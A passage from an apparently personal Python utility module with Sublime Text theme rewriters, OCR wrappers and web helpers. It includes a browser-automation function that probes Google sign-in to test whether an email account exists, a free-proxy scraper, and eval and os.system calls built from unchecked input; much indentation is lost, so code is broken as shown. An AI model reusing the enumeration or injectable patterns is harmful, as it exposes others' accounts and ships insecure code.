(True)-->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>User-defined constant</string>\n <key>scope</key>\n <string>constant.character, constant.other</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string> <!-- %s -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Variable</string>\n <key>scope</key>\n <string>variable</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Keyword</string>\n <key>scope</key>\n <string>keyword - (source.c keyword.operator | source.c++ keyword.operator | source.objc keyword.operator | source.objc++ keyword.operator), keyword.operator.word</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string> <!-- default #__blank__ import/while/for/try/except/as -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Annotation Punctuation</string>\n <key>scope</key>\n <string>punctuation.definition.annotation</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>JavaScript Dollar</string>\n <key>scope</key>\n <string>variable.other.dollar.only.js</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Storage</string>\n <key>scope</key>\n <string>storage</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Storage type</string>\n <key>scope</key>\n <string>storage.type</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string> <!-- default: __blank__ (class/def) -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Entity name</string>\n <key>scope</key>\n <string>entity.name - (entity.name.filename | entity.name.section | entity.name.tag | entity.name.label)</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string> <!-- default: A6E22E class/def (function)-->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Inherited class</string>\n <key>scope</key>\n <string>entity.other.inherited-class</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic underline</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Function argument</string>\n <key>scope</key>\n <string>variable.parameter - (source.c | source.c++ | source.objc | source.objc++)</string>\n <key>settings</key>\n <!--\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n -->\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string> <!-- def hi( (kw)= ) -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Language variable</string>\n <key>scope</key>\n <string>variable.language</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Tag name</string>\n <key>scope</key>\n <string>entity.name.tag</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n 
<string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Tag attribute</string>\n <key>scope</key>\n <string>entity.other.attribute-name</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Function call</string>\n <key>scope</key>\n <string>variable.function, variable.annotation</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string> <!--x.stdout.readline()) (readline()) -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Library function</string> <!--input("Product_url?: ") #__blank__-->\n <key>scope</key>\n <string>support.function, support.macro</string>\n <key>settings</key>\n <!--\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n -->\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Library constant</string>\n <key>scope</key>\n <string>support.constant</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Library class/type</string>\n <key>scope</key>\n <string>support.type, support.class</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Library variable</string>\n <key>scope</key>\n <string>support.other.variable</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Invalid</string>\n <key>scope</key>\n <string>invalid</string>\n <key>settings</key>\n <dict>\n <key>background</key>\n <string>#000000</string>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Invalid deprecated</string>\n <key>scope</key>\n <string>invalid.deprecated</string>\n <key>settings</key>\n <dict>\n <key>background</key>\n <string>#__blank__</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>JSON String</string>\n <key>scope</key>\n <string>meta.structure.dictionary.json string.quoted.double.json</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>YAML String</string>\n <key>scope</key>\n <string>string.unquoted.yaml</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n\n <dict>\n <key>name</key>\n <string>diff.header</string>\n <key>scope</key>\n <string>meta.diff, meta.diff.header</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup headings</string>\n <key>scope</key>\n <string>markup.heading</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>bold</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup headings</string>\n <key>scope</key>\n <string>markup.heading 
punctuation.definition.heading</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup h1</string>\n <key>scope</key>\n <string>markup.heading.1 punctuation.definition.heading</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup links</string>\n <key>scope</key>\n <string>markup.underline.link</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup bold</string>\n <key>scope</key>\n <string>markup.bold</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>bold</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup italic</string>\n <key>scope</key>\n <string>markup.italic</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup bold/italic</string>\n <key>scope</key>\n <string>markup.italic markup.bold | markup.bold markup.italic</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>bold italic</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup hr</string>\n <key>scope</key>\n <string>punctuation.definition.thematic-break</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup blockquote</string>\n <key>scope</key>\n <string>markup.quote punctuation.definition.blockquote</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup bullets</string>\n <key>scope</key>\n <string>markup.list.numbered.bullet</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup bullets</string>\n <key>scope</key>\n <string>markup.list.unnumbered.bullet | (markup.list.numbered punctuation.definition)</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup code</string>\n <key>scope</key>\n <string>markup.raw</string>\n <key>settings</key>\n <dict>\n <key>background</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup punctuation</string>\n <key>scope</key>\n <string>markup.raw punctuation.definition.raw</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup punctuation</string>\n <key>scope</key>\n <string>text & (punctuation.definition.italic | punctuation.definition.bold | punctuation.definition.raw | punctuation.definition.link | punctuation.definition.metadata | punctuation.definition.image | punctuation.separator.table-cell | punctuation.section.table-header | punctuation.definition.constant)</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>diff.deleted</string>\n <key>scope</key>\n <string>markup.deleted</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>diff.inserted</string>\n 
<key>scope</key>\n <string>markup.inserted</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>diff.changed</string>\n <key>scope</key>\n <string>markup.changed</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>scope</key>\n <string>constant.numeric.line-number.find-in-files - match</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>scope</key>\n <string>entity.name.filename</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n\n <dict>\n <key>scope</key>\n <string>message.error</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n </array>\n </dict>\n </plist>'
self.Monokai_color_scheme = '{\n "name": "Monokai",\n "author": "Sublime HQ Pty Ltd, Wimer Hazenberg",\n "variables":\n {\n "text": "#ffffff",\n "background": "#000000",\n "comment": "#ff1700",\n },\n "globals":\n {\n "foreground": "var(text)",\n "background": "var(background)",\n "caret": "var(text)",\n "invisibles": "var(background)",\n "line_highlight": "var(background)",\n "selection": "var(background)",\n "selection_border": "var(text)",\n "misspelling": "var(background)",\n "active_guide": "var(text)",\n "find_highlight_foreground": "var(text)",\n "find_highlight": "var(text)",\n "brackets_options": "underline",\n "brackets_foreground": "var(text)",\n "bracket_contents_options": "underline",\n "bracket_contents_foreground": "var(text)",\n "tags_options": "stippled_underline"\n }, "rules":\n [\n {\n "name": "Comment",\n "scope": "comment",\n "foreground": "var(comment)"\n },\n {\n "name": "String",\n "scope": "string",\n "foreground": "var(text)"\n },\n {\n "name": "Number",\n "scope": "constant.numeric",\n "foreground": "var(text)"\n },\n {\n "name": "Built-in constant",\n "scope": "constant.language",\n "foreground": "var(text)"\n },\n {\n "name": "User-defined constant",\n "scope": "constant.character, constant.other",\n "foreground": "var(text)"\n },\n {\n "name": "Variable",\n "scope": "variable"\n },\n {\n "name": "Keyword",\n "scope": "keyword - (source.c keyword.operator | source.c++ keyword.operator | source.objc keyword.operator | source.objc++ keyword.operator), keyword.operator.word",\n "foreground": "var(text)"\n },\n {\n "name": "Annotation Punctuation",\n "scope": "punctuation.definition.annotation",\n "foreground": "var(text)"\n },\n {\n "name": "JavaScript Dollar",\n "scope": "variable.other.dollar.only.js",\n "foreground": "var(text)"\n },\n {\n "name": "Storage",\n "scope": "storage",\n "foreground": "var(text)"\n },\n {\n "name": "Storage type",\n "scope": "storage.type",\n "foreground": "var(text)",\n "font_style": "italic"\n },\n {\n "name": "Entity name",\n "scope": "entity.name - (entity.name.filename | entity.name.section | entity.name.tag | entity.name.label)",\n "foreground": "var(text)"\n },\n {\n "name": "Inherited class",\n "scope": "entity.other.inherited-class",\n "foreground": "var(text)",\n "font_style": "italic underline"\n },\n {\n "name": "Function argument",\n "scope": "variable.parameter - (source.c | source.c++ | source.objc | source.objc++)",\n "foreground": "var(text)",\n "font_style": "italic"\n },\n {\n "name": "Language variable",\n "scope": "variable.language",\n "foreground": "var(text)",\n "font_style": "italic"\n },\n {\n "name": "Tag name",\n "scope": "entity.name.tag",\n "foreground": "var(text)"\n },\n {\n "name": "Tag attribute",\n "scope": "entity.other.attribute-name",\n "foreground": "var(text)"\n },\n {\n "name": "Function call",\n "scope": "variable.function, variable.annotation",\n "foreground": "var(text)"\n },\n {\n "name": "Library function",\n "scope": "support.function, support.macro",\n "foreground": "var(text)"\n },\n {\n "name": "Library constant",\n "scope": "support.constant",\n "foreground": "var(text)"\n },\n {\n "name": "Library class/type",\n "scope": "support.type, support.class",\n "foreground": "var(text)",\n "font_style": "italic"\n },\n {\n "name": "Library variable",\n "scope": "support.other.variable"\n },\n {\n "name": "Invalid",\n "scope": "invalid",\n "foreground": "var(text)",\n "background": "var(background)"\n },\n {\n "name": "Invalid deprecated",\n "scope": "invalid.deprecated",\n "foreground": 
"var(text)",\n "background": "var(background)"\n },\n {\n "name": "JSON String",\n "scope": "meta.structure.dictionary.json string.quoted.double.json",\n "foreground": "var(text)"\n },\n {\n "name": "YAML String",\n "scope": "string.unquoted.yaml",\n "foreground": "var(text)"\n },\n {\n "name": "diff.header",\n "scope": "meta.diff, meta.diff.header",\n "foreground": "var(text)"\n },\n {\n "name": "markup headings",\n "scope": "markup.heading",\n "font_style": "bold"\n },\n {\n "name": "markup headings",\n "scope": "markup.heading punctuation.definition.heading",\n "foreground": "var(text)"\n },\n {\n "name": "markup h1",\n "scope": "markup.heading.1 punctuation.definition.heading",\n "foreground": "var(text)"\n },\n {\n "name": "markup links",\n "scope": "markup.underline.link",\n "foreground": "var(text)"\n },\n {\n "name": "markup bold",\n "scope": "markup.bold",\n "font_style": "bold"\n },\n {\n "name": "markup italic",\n "scope": "markup.italic",\n "font_style": "italic"\n },\n {\n "name": "markup bold/italic",\n "scope": "markup.italic markup.bold | markup.bold markup.italic",\n "font_style": "bold italic"\n },\n {\n "name": "markup hr",\n "scope": "punctuation.definition.thematic-break",\n "foreground": "var(text)"\n },\n {\n "name": "markup blockquote",\n "scope": "markup.quote punctuation.definition.blockquote",\n "foreground": "var(text)"\n },\n {\n "name": "markup bullets",\n "scope": "markup.list.numbered.bullet",\n "foreground": "var(text)"\n },\n {\n "name": "markup bullets",\n "scope": "markup.list.unnumbered.bullet | (markup.list.numbered punctuation.definition)",\n "foreground": "color(var(text)"\n },\n {\n "name": "markup code",\n "scope": "markup.raw",\n "background": "color(var(text)"\n },\n {\n "name": "markup punctuation",\n "scope": "markup.raw punctuation.definition.raw",\n "foreground": "color(var(text)"\n },\n {\n "name": "markup punctuation",\n "scope": "text & (punctuation.definition.italic | punctuation.definition.bold | punctuation.definition.raw | punctuation.definition.link | punctuation.definition.metadata | punctuation.definition.image | punctuation.separator.table-cell | punctuation.section.table-header | punctuation.definition.constant)",\n "foreground": "color(var(text)"\n },\n {\n "name": "diff.deleted",\n "scope": "markup.deleted",\n "foreground": "var(text)"\n },\n {\n "name": "diff.inserted",\n "scope": "markup.inserted",\n "foreground": "var(text)"\n },\n {\n "name": "diff.changed",\n "scope": "markup.changed",\n "foreground": "var(text)"\n },\n {\n "scope": "constant.numeric.line-number.find-in-files - match",\n "foreground": "color(var(text)"\n },\n {\n "scope": "entity.name.filename",\n "foreground": "var(text)"\n },\n {\n "scope": "message.error",\n "foreground": "var(text)"\n }\n ]\n}'
def get_random_color_code(self):
x = [0,1,2,3,4,5,6,7,8,9,"a","b","c","d","e","f"]
import random
y = ""
for i in range(6):
y += str(random.sample(x, 1)[0])
print(y)
return y
def colorama(self, specific_colour_code = None, sleeptime=2):
        try:specific_colour_code = eval(specific_colour_code)
        except:pass
        if specific_colour_code == "on_clipboard":
            for idx, i in enumerate(pyperclip.paste().split("\n")):
                with open(self.theme_path, "w") as f:
                    f.write(self.blank.replace("__blank__", i))
                os.system("say '%s'"%idx)
                time.sleep(int(sleeptime))
            return
        while True:
            with open(self.theme_path, "w") as f:
                if specific_colour_code == None:
                    f.write(self.blank.replace("__blank__", self.get_random_color_code()))
                else:
                    f.write(self.blank.replace("__blank__", specific_colour_code))
                    return
            time.sleep(int(sleeptime))
def change_colours(self, color_code = None):
print(json.dumps(self.discovered_colours, indent=4))
with open(self.theme_path, "w") as f:
f.write(self.blank.replace("__blank__", color_code))
def change_comment_colours(self, color_code = None):
with open(self.theme_path, "r") as f:
x = f.read()
with open(self.theme_path, "w") as f:
f.write(x.replace("FF1700", color_code))
def change_background_colour(self, color_code = None):
with open(self.theme_path, "r") as f:
x = f.read()
with open(self.theme_path, "w") as f:
f.write(x.replace("000000", color_code))
def normal(self):
SublimeText_Normal_text = ExecutableText().export("SublimeText_Normal_text")
with open(self.theme_path, "w") as f:
f.write(SublimeText_Normal_text)
def argh_text(self, hex="ffffff"):
hex=(self.get_random_color_code())if(None==hex)else(hex)
self.hexes[-1].argh_text = hex
R = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.sublime-color-scheme")
F = re.sub(r'"text": "#.*', '"text": "#%s",' % (hex), open(R,"r").read())
open(R, "w").write(F)
def argh2_comments(self, hex="ffffff"):
hex=(self.get_random_color_code())if(None==hex)else(hex)
self.hexes[-1].argh2_comments = hex
R = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.sublime-color-scheme")
F = re.sub(r'"comment": "#.*', '"comment": "#%s",' % (hex), open(R,"r").read())
open(R, "w").write(F)
def argh_background(self, hex="000000"):
hex=(self.get_random_color_code())if(None==hex)else(hex)
self.hexes[-1].argh_background = hex
R = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.sublime-color-scheme")
F = re.sub(r'"background": "#.*', '"background": "#%s",' % (hex), open(R,"r").read())
open(R, "w").write(F)
def argh_colorama(self, text = True, comments = True, background = False, direction = None):
if direction is not None:
if direction == "left":
self.current_idx = self.current_idx - 1 if (self.current_idx - 1) >= 0 else self.current_idx
if text: self.argh_text(self.hexes[self.current_idx].argh_text)
if comments: self.argh2_comments(self.hexes[self.current_idx].argh2_comments)
if background: self.argh_background(self.hexes[self.current_idx].argh_background)
elif direction == "right":
self.current_idx = self.current_idx + 1 if (self.current_idx + 1) < len(self.hexes) else self.current_idx
if text: self.argh_text(self.hexes[self.current_idx].argh_text)
if comments: self.argh2_comments(self.hexes[self.current_idx].argh2_comments)
if background: self.argh_background(self.hexes[self.current_idx].argh_background)
return
self.hexes.append(AttrDict())
self.current_idx = len(self.hexes) - 1
if text == True:
self.argh_text(hex = None)
elif text != False:
self.argh_text(hex = text)
if comments == True:
self.argh2_comments(hex = None)
elif comments != False:
self.argh2_comments(hex = comments)
if background == True:
self.argh_background(hex = None)
elif background != False:
self.argh_background(hex = background)
def argh_norm(self):
R = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.sublime-color-scheme")
open(R, "w").write(self.Monokai_color_scheme)
class Tesseract:
def __init__(self):
import pytesseract
import textract
import pyocr
from PIL import Image
globals().update({k:v for k,v in locals().items() if "self" != k})
def pytesseract(self, x):
x = Images().download(x) if not os.path.exists(x) else x
if(None==x):return(None)#@Added Because It Could Be Images.Download Hits 404 Returns None,
[setitem(globals(), "img", Image.open(x)), setitem(globals(), "img", globals()["img"].convert("L")), globals()["img"].save(x)]
x = pytesseract.image_to_string(Image.open(x)).strip()
redprint("[result\n][%s]"%x)
return x
def textract(self, x):
x = Images().download(x) if not os.path.exists(x) else x
if(None==x):return(None)#@Added Because It Could Be Images.Download Hits 404 Returns None,
[setitem(globals(), "img", Image.open(x)), setitem(globals(), "img", globals()["img"].convert("L")), globals()["img"].save(x)]
x = textract.process(x, encoding='ascii', method='tesseract').decode().strip()
redprint("[result\n][%s]"%x)
return x
def pyocr(self, x):
x = Images().download(x) if not os.path.exists(x) else x
if(None==x):return(None)#@Added Because It Could Be Images.Download Hits 404 Returns None,
[setitem(globals(), "img", Image.open(x)), setitem(globals(), "img", globals()["img"].convert("L")), globals()["img"].save(x)]
x = pyocr.get_available_tools()[0].image_to_string(Image.open(x), builder=pyocr.builders.TextBuilder()).strip()
redprint("[result\n][%s]"%x)
return x
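# An illustrative OCR call, assuming tesseract plus the pytesseract/textract/pyocr packages
# imported in __init__ are installed. Each method accepts a local path or an image URL (remote
# images go through Images().download first); "sample.png" is a hypothetical file.
"""
t = Tesseract()
redprint(t.pytesseract("sample.png"))
redprint(t.pyocr("sample.png"))
"""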
class TestClass(int):
def __new__(cls, *args, **kwargs):
return super(TestClass, cls).__new__(cls, 5)
"""
print(TestClass())
"""
class Time(object):
def __init__(self, _str=None):
if or_list(_str,[],None) == None: _str = datetime.now()
self.timestr = (self.parse_date(_str).strftime("%Y-%m-%d %H:%M:%S"))if(type(_str)==str)else(_str.strftime("%Y-%m-%d %H:%M:%S"))
self.timeobj = (self.parse_date(_str))if(type(_str)==str)else(_str)
def parse_date(self,w,remove_tzinfo=True,localize_timezone=False):
        import dateutil.parser
        x = dateutil.parser.parse(w)
        y = x.astimezone()if(localize_timezone==True)else(x)
        z = y.replace(tzinfo=None)if(remove_tzinfo==True)else(y)
        return z
def strftime(self, srftime_string):
return self.timeobj.strftime(srftime_string)
def __repr__(self):
return self.timestr
def __sub__(self, _str):
if type(_str) == int:
return Time(self.timeobj - timedelta(_str))
else:
x = (self.timeobj - _str.timeobj)
class Timedelta(object):
def __init__(self, x):
self.timedelta = x
self.days = self.timedelta.days#
self.microseconds = self.timedelta.microseconds#
self.seconds = self.timedelta.seconds#
def hours(self):#
return int(self.total_seconds() / 3600)
def minutes(self):#
return int(self.total_seconds() / 60)
def total_seconds(self):#
return self.timedelta.total_seconds()
def total_minutes(self):
return int(self.total_seconds() / 60) + (round( ((self.total_seconds() % 60)/60),2))
return Timedelta(x)
def __add__(self, _str):
if type(_str) == int:
return Time(self.timeobj + timedelta(_str))
def __lt__(self, _str):
return self.timeobj < _str.timeobj
def __gt__(self, _str):
return self.timeobj > _str.timeobj
def __eq__(self, _str):
return self.timeobj == _str.timeobj
def __call__(self):
return self.timeobj
def date(self):
return self.timeobj
def str(self):
return self.timestr
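# An illustrative sketch of the Time wrapper's arithmetic: subtracting an int shifts back that
# many days and returns a new Time, while subtracting another Time returns the local Timedelta
# wrapper with .days, .hours() and .total_minutes().
"""
now = Time()
last_week = now - 7
delta = now - last_week
print(delta.days, delta.hours(), delta.total_minutes())   # 7 168 10080.0
print(Time("2018-08-29 04:23:28") < now)
"""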
class TrueFalseStatements:
def __init__(self):
pyperclip.copy(
"""
In [292]: '''1 0 0 0 1 0 1 1 1 1 1 1 0 1 0 0 1'''
Out[292]: '1 0 0 0 1 0 1 1 1 1 1 1 0 1 0 0 1'
In [293]: def true():return [print('true'),1][1]
In [294]: def false():return [print('false'),0][1]
In [295]: def truth():return [print('true'),1][1]
In [296]: [print('t'),1][1] and ([print('f'),0][1] or [print('t'),1][1])
t
f
t
Out[296]: 1
In [297]: true() and (false() or false() or false() or true()) and (false() or true()) and true() and true() and true() and true() and true() and (false(
...: ) or true()) and (false() or false() or true())
true
false
false
false
true
false
true
true
true
true
true
true
false
true
false
false
true
Out[297]: 1
In [298]: '1 and (false or false or false or truth) and (false or truth) and tru and tru and tru and tru and tru and (fls or tru) and (f f t)'
Out[298]: '1 and (false or false or false or truth) and (false or truth) and tru and tru and tru and tru and tru and (fls or tru) and (f f t)'
""" . replace('\n ',''))
""" Internet-Utils """
def BeautifulSoup(x, y="lxml"):
from bs4 import BeautifulSoup as BeautifulSoup
return BeautifulSoup(x, "lxml")
def SOUP(x, y="lxml"):
from bs4 import BeautifulSoup as SOUP
return SOUP(x, "lxml")
def SOUPY(soup,x=None,y=None,z=None):
import bs4
if type(soup) != bs4.BeautifulSoup: soup = BeautifulSoup(str(soup))
if x==None: return soup
return(soup.findAll(x)if(None==y==z)else(soup.findAll(x,attrs={y:z})))
def addressurl(url, part = 0):
return ("%s%s.png" % (Replacements(address_normalize(url), "/", " "), (":%s:"%(part))if(part!=0)else("") ))
"""
ss = Browser()("sele")
ss.get("google.com")
assert addressurl(ss.current_url, part = 0) == "https: www.google.com.png"
assert addressurl(ss.current_url, part = 1) == "https: www.google.com:1:.png"
"""
def bitly_url(url):
return json.loads(requests.get("https://api-ssl.bitly.com/v3/shorten?access_token={}&longUrl={}".format(Muta()().bitly_access_token, url)).text)["data"]["url"]
"""
bitly_url("https://google.com")
"""
def blocktext_to_session_headers(x):
    x=x.strip().split("\n")
    x={i.split(": ",1)[0] if not i.split(": ",1)[0].startswith(":") else(i.split(": ",1)[0][1:]):i.split(": ",1)[1] for i in x }
    return x
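# A small sketch of blocktext_to_session_headers on a copied request-headers block; pseudo-header
# names such as ":authority" get their leading colon stripped. The header values are illustrative.
"""
headers = blocktext_to_session_headers('''
:authority: www.example.com
user-agent: Mozilla/5.0
accept: text/html
''')
# -> {'authority': 'www.example.com', 'user-agent': 'Mozilla/5.0', 'accept': 'text/html'}
"""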
def check_gmail_account_exists(x):
ss = Browser()("ph")
ss.get("https://accounts.google.com/signin/v2/identifier")
blueprint("got page")
ss.ffs("input","type","email").send_keys(x).sp(2)
blueprint("entered in email")
ss.jtns("span","click",{"text":"Next"}).sp(5)
blueprint("clicked next button")
exists = None
if "/pwd" in ss.current_url:
blueprint(ss.current_url)
exists = True # exists
else:
exists = False
ss.quit()
return exists
"""
blueprint(check_gmail_account_exists("test"))
blueprint(check_gmail_account_exists("asjdgasjgepawokgepak"))
"""
def cookies_to_database(username,website_name,cookies=None,reverse=True):
# return Binarydata().update_or_create([pickle.dump(cookies,open("%s|%s|Cookies.ini"%(username,website_name),"wb")),"%s|%s|Cookies.ini"%(username,website_name)][1])if(reverse==False)else([Binarydata().export("%s|%s|Cookies.ini"%(username,website_name)),pickle.load(open("%s|%s|Cookies.ini"%(username,website_name),"rb")),rm("%s|%s|Cookies.ini"%(username,website_name)) ][1])
return Binarydata().update_or_create([pickle.dump(cookies,open("%s|%s|Cookies.ini"%(username,website_name),"wb")),"%s|%s|Cookies.ini"%(username,website_name)][1])if(reverse==False)else([Binarydata().export("%s|%s|Cookies.ini"%(username,website_name)),pickle.load(open("%s|%s|Cookies.ini"%(username,website_name),"rb")), ][1])
def cookies_to_session(cookies, session):
for cookie in cookies:
session.cookies.set(cookie['name'], cookie['value'])
return session
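# A hedged sketch of cookies_to_session: it copies selenium-style cookie dicts (name/value keys)
# onto a requests.Session so later plain requests reuse the browser's login state. The cookie
# name and value shown are placeholders.
"""
s = requests.Session()
s = cookies_to_session([{"name": "sessionid", "value": "abc123"}], s)
"""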
def firefox65_do(executable_string):
os.system("pip install selenium==3.14.1 && sleep 2 && cd /Users/$USER/tavern/tavern && /Users/$USER/tavern/bin/python3.5 -c 'from soda.can import *; %s' ; sleep 10 && pip install selenium==2.53.1 && killall python3.5 ; killall python ; echo complete ; sleep 10" % (executable_string))
def get_ali_url(x):
return Get(Product,shop=Muta()().store_abbre,handle=x).ali_url
def get_all_chrome_urls():
return subprocess.getoutput("""osascript -e'set text item delimiters to linefeed' -e'tell app "Google Chrome 70" to url of tabs of window 1 as text'""").split("\n")
def get_one(_, *args, **kwargs):
__ = _
_ = _.objects.filter(**{a:v for a,v in kwargs.items() if "__range" not in a and not [i for i in __._meta.fields if i.name == a.split("__")[0] and type(i) == JSONField]})
if {a:v for a,v in kwargs.items() if "__range" not in a and [i for i in __._meta.fields if i.name == a.split("__")[0] and type(i) == JSONField]}:
_ = filter(_,**{a:v for a,v in kwargs.items() if "__range" not in a and [i for i in __._meta.fields if i.name == a.split("__")[0] and type(i) == JSONField]})
if args and not [i[0] for i in sum(key("children",args),[]) if [j for j in __._meta.fields if j.name == i[0] and type(j) == JSONField]]:
_ = _.filter(*args)
if args and [i[0] for i in sum(key("children",args),[]) if [j for j in __._meta.fields if j.name == i[0] and type(j) == JSONField]]:
_ = filter(_,*args)
for a,v in kwargs.items():
if "__range" in a:
field = a.split("__",1)[0]
for i in _:
setattr(i, field, Date(getattr(i, field)).dateobj )
class myList(list):
1
_ = myList([i for i in _ if Date(v[0]).dateobj<= getattr(i,field) <= Date(v[1]).dateobj ])
if type(_) == list:
class myList(list):
1
_ = myList(_)
n = lambda self, x: list(self)[x]
( bind3(_,len), bind3(_,n) )
_ = _[0]
return _
def get_us_ip_list():
try:
soup = BeautifulSoup(requests.get("https://free-proxy-list.net/").text)
soup.findAll("td")
x = key("text", soup.findAll("td"))
y = [i for i in x if i.count(".") == 3 or tryprocess(int, i) == 1]
proxy_list = ["%s:%s"%(i,j) for i,j in zip(y[0::2], y[1::2])]
if len(proxy_list) == 0:
q = redinput("redo/Error in My_Requests().set_proxies() | proxy_list == [] | check requests.get('http://www.free-proxy-list.net') ")
if q == "redo": return get_us_ip_list()
if random.randrange(1,3) == 1: proxy_list = list(tcer(proxy_list))
else: random.shuffle(proxy_list)
return proxy_list
except :
